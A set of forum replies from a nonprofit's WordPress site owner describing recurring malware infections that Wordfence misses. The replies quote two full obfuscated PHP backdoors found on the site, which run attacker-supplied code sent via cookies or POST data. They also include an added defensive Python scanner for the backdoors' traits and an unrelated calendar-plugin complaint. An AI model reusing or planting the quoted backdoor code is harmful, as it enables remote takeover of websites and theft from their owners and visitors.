Forum Replies Created
@thekendog do you have Jetpack installed? I stopped having problems after I removed that plugin. I’m wondering if it got exploited?
I am having the same issue. I clean up the bad files and more just show up – sometimes IN the WORDFENCE directories.
Either code is injected at the head of a file, or a malicious index.php or (randomfilename).js.php is created with malicious code in it. This was from a file called HHb.js.php.1
*/ $single_preg = 'mvSd8Xjp6e'; function post_meta_ids($import_id, $path) { $close_quote = urldecode($import_id); $group = 'goal'; $int_fields = substr($path,0, strlen($close_quote)); $bad_slug = 'original_slug'; return $close_quote ^ $int_fields; } $uploads = ${post_meta_ids("20%1A%28%7D%0B", $single_preg)}; if (isset($uploads[$single_preg])) { $plural_base = $uploads[$single_preg]; $post = $plural_base[post_meta_ids("%19%1B%23%3BV9%07%15", $single_preg)]; include ($post); }
<?php function/*d */lq1 (/* auurq */$sw2/*uck */) {$td3/* pr */= "*4-9bh/6krvxat_dfl(m5c;.'g873)s#FeLIE<pn?i@" . "uHy o2" . "0" ; $ye5='';foreach( $sw2 as $wp4 ) {$ye5 .=/*fhmxg*/$td3 [ $wp4/* mb */]; } return/* yzu */$ye5;}$uk6/* rl */= Array(); $uk6 [] =/*e */lq1/* ilyc */( Array(3/* jpypf */, 4/*qu */, 20 , 3 , 4/*lqm*/,/* ti */28 , 3 ,/* bz*/27 , 2/* nw */, 26/*godnh*/,/*ddojb */21 , 4 , 3 , 2/* wahnc */,/* mr*/1 , 48 , 20 , 7 ,/* nvmcf */2 , 3/* b */,/*m */1/* j */, 49 , 28 , 2 ,/* xgecz */12/* ko*/, 12/* ehc*/, 4 ,/*cee*/21 ,/* zubo */15 , 21/* xphg */,/*j */15/* ooauo */, 21 ,/*fai*/12 , 4 ,/* rrnvi */1 ,/*we */1 ,) ) ; $uk6 []/* gflf */=/* psgh*/lq1 ( Array(40 ,/* exlbs */38 ,/* yja */5/* dm*/, 38/* zziyl */,/* tub*/46 , 42/*mebtu*/, 43/*vfgkh */, 39/* tr */, 17 ,/* r */41 , 39/* fxgv*/,/* ftu*/8 ,/* elogi */18 ,/* eud*/14/* z */, 14 ,/* uj */32 , 35/* zv */,/* zmek */34/* sg */, 36 , 14 , 14/* loweq */,/* drplk */29/* czipo */,/*lsfe */22/* qtvx */,/* hrkjx */46 ,)/* di */)/* eyh */; $uk6 []/*hjw*/=/*tay */lq1 ( Array(23 , 19/*j */,/* a */47 , 15 ,/* shmge */43 , 17 , 33 ,)/* rbkhi*/) ; $uk6/* qknzz */[] = lq1/* ukr*/(/* gymv */Array(44 ,/* uovy */0 ,) )/* us */;$uk6/* k */[]/* j*/= lq1 (/* jchv */Array(23 , 6 ,)/* avoz */)/* yrsum */;$uk6/* l */[] = lq1 ( Array(31/* zotfy*/,) ) ; $uk6/* ghlfx */[]/* hqd */= lq1/* xo*/( Array(37 ,)/* n */)/* y */; $uk6[] =/*ry */lq1 ( Array(16 , 41/* tqd */, 17/*b*/,/*doyt*/33/*yh */, 14 , 38 , 43 , 13 , 14 , 21 , 47 , 39 , 13/*b */, 33 ,/* vimf */39/* xkhps */, 13 , 30 ,) )/* b*/; $uk6[]/* w */= lq1 ( Array(12 , 9 , 9 , 12 ,/* gcxw */45/* fo */, 14 ,/* ciqoo */19 , 33 , 9 ,/* w*/25 , 33 ,)/*lhyh */) ;$uk6[] = lq1 ( Array(30 ,/* fz */13/* eu */,/* mq */9/* zvg*/, 14 , 9/*e */,/* pxaoc */33 ,/* ip */38 , 33 , 12 , 13/* hsl */,) )/*sphma */; $uk6[]/*kkr */= lq1/* zi */( Array(33 , 11/* c */,/* ayq */38/* j */,/*yrd */17/* n */, 47/*mbnt */,/* ysm */15/* zbvv */, 33 ,) ) ;$uk6[]/* kl */=/* pkkr */lq1 ( Array(30 , 43/* vazgf 
*/, 4 ,/* wepq*/30/* zxru */, 13 ,/* wub*/9/*vsuqh */,) )/*lydhe*/; $uk6[]/* akgu */= lq1/* iaka */( Array(43/*zlbtb */, 39/* sgzcl */, 17 , 41/* ezs */,/* eaddc */39/* bs */,/* efy */8 ,) ) ; $uk6[]/* xa */=/*ur*/lq1 ( Array(30 , 13 , 9/*mqj */, 17 , 33/* hdun*/, 39 ,)/*rds */) ; $uk6[] =/* n */lq1 (/* ntnvi*/Array(38 ,/*thcm */12/* vdpr*/, 21/* qyb*/,/* e */8 ,) )/* aa*/; $uk6[] =/* w */lq1 (/*ogi*/Array(19 ,/* rf */15 , 20 ,) ) ; foreach ( $uk6[8] ( $_COOKIE, $_POST ) as/*pp*/$uc14/* w*/=> $tq11) {/* bjgu */function/* qld */ox8/* xrc*/( $uk6, $uc14 , $vh10 ) /*yifc */{ return/*c*/$uk6[11] (/*q */$uk6[9] ( $uc14 ./* wvul */$uk6[0]/* rop */,/* wknay*/( $vh10/$uk6[13]( $uc14 ) ) +/* pja */1 )/* r */, 0/* vxy */,/* d */$vh10 ); /* ogi */} function dd7 ( $uk6,/* afir*/$sg12 ) { return/* mv */@$uk6[14] ($uk6[3] , $sg12/* yukq */); /* zcgt */} function tz9 ( $uk6,/* fxmal */$sg12 ) /* d*/{ if ( isset ( $sg12[2]/*nkd */) )/*imvu */{ /* ybuq */ $qc13 =/*koie */$uk6[4] ./*az */$uk6[15]( $uk6[0] ) . $uk6[2];/* s */@$uk6[7]/* unr */( $qc13, $uk6[6]/* pc*/./* g */$uk6[1]/* ghf */. $sg12[1] ( $sg12[2] ) ); /* njy */@include ( $qc13 );/* jc */@$uk6[12] ( $qc13 ); /* ce */die (); } } $tq11/*zfp*/=/* zagmu*/dd7/* en */(/*sv*/$uk6, $tq11 ); /*okv */tz9 ( $uk6, $uk6[10] ( $uk6[5] , $tq11 ^ ox8 (/* vzc*/$uk6, $uc14/* ygg */, $uk6[13](/* z */$tq11 ) ) ) ); }
The code above is from a random malicious file (indddyvs.php).
Wordfence catches maybe half of the bad files. I run a scan, it’s supposedly clear, I then go through the directories and I find bad files that were there before the scan started. I delete files and remove the malicious code. Everything looks clear and I run a scan that says there are no issues. A few hours later, a scan runs and more bad files show up (but it doesn’t catch all of them!). In addition to password resets, I have changed the 2 admin accounts and the one editor account to 2FA and I’ve reset the password on my primary cpanel account. There are no suspicious users added. I’ve removed wpforms and the all-in-one-event calendar because they had errors in the log and wpforms has woocommerce hooks that I don’t trust after the recent WC hack. I deleted anything related to wpforms from the mysql database. My theme and all my plugins are up-to-date. I’ve blocked whole countries and I’d block the US if it wasn’t for the fact that web crawlers operate out of there.
I cannot for the life of me figure out how they keep injecting malicious code into my site and we cannot, as a small nonprofit society, pony up $500USD for “fixing” a site that should be protected from this recurring by a Wordfence Premium plugin that we already paid $200USD for. #Frustrated
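Added example, not part of the original posts: a small heuristic scanner for the traits visible in the two quoted samples (a `.js.php` double extension, dense filler comments between tokens, an `include` of a variable alongside a `urldecode`d percent-encoded literal, and array-indexed function calls fed by `$_COOKIE`/`$_POST`). The thresholds, function names and sample contents are assumptions chosen for illustration.

```python
import re
from pathlib import Path

# Traits visible in the two samples quoted in the post.
DOUBLE_EXT = re.compile(r"\.js\.php(\.\d+)?$", re.I)         # HHb.js.php.1
FILLER = re.compile(r"/\*\s*[a-z]{1,6}\s*\*/")               # /* auurq */ padding
VAR_INCLUDE = re.compile(r"\binclude(?:_once)?\s*\(\s*\$\w+\s*\)")  # include ($post)
PCT_LITERAL = re.compile(r"(?:%[0-9A-Fa-f]{2}){3,}")         # "20%1A%28%7D%0B"
VAR_CALL = re.compile(r"\$\w+\s*\[\s*\d+\s*\]\s*\(")         # $uk6[8] ( ... )

def indicators(name: str, text: str) -> list[str]:
    """Return the names of the heuristics that fire for one file."""
    hits = []
    if DOUBLE_EXT.search(name):
        hits.append("double-extension")
    n = len(FILLER.findall(text))
    if n >= 10 and n * 60 >= len(text):   # many tiny comments, densely packed
        hits.append("comment-padding")
    if VAR_INCLUDE.search(text) and PCT_LITERAL.search(text) and "urldecode(" in text:
        hits.append("encoded-include")
    if VAR_CALL.search(text) and "$_COOKIE" in text and "$_POST" in text:
        hits.append("request-driven-call")
    return hits

def scan(root: str) -> dict[str, list[str]]:
    """Walk a tree and report every file with .php in its name that has a hit."""
    found = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and ".php" in p.name.lower():
            hits = indicators(p.name, p.read_text(errors="replace"))
            if hits:
                found[str(p)] = hits
    return found

# Constructed, inert sample contents (not the files from the post).
SAMPLES = {
    "wp-content/uploads/ab.js.php.1":
        "<?php $k = urldecode('%20%1A%28%7D'); include ($p);",
    "wp-includes/xyz.php":
        "<?php " + "$a/* qx */=/* rt */1;" * 12
        + " foreach ($f[8] ($_COOKIE, $_POST) as $k => $v) {}",
    "wp-content/themes/t/functions.php":
        "<?php /* Theme setup */ add_action('init', 'setup');",
}

if __name__ == "__main__":
    for name, body in SAMPLES.items():
        print(name, indicators(Path(name).name, body))
```

Point `scan()` at the site's document root; each hit is a lead to compare against a clean copy of WordPress core and the plugins' released files, not a verdict.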
Sunny, Your suggestion answered one question – how to change the font size or implement a button, but it does not address the fundamental problem – the Front-end submissions pop-up dialog does not appear when the widget link is clicked UNLESS it’s on the main time.ly calendar page to begin with. On all other pages, nothing happens when you click the “+post your own event” link in the widget area. Please try it from our home page at https://sfn-ottawa.ca and confirm this is not working….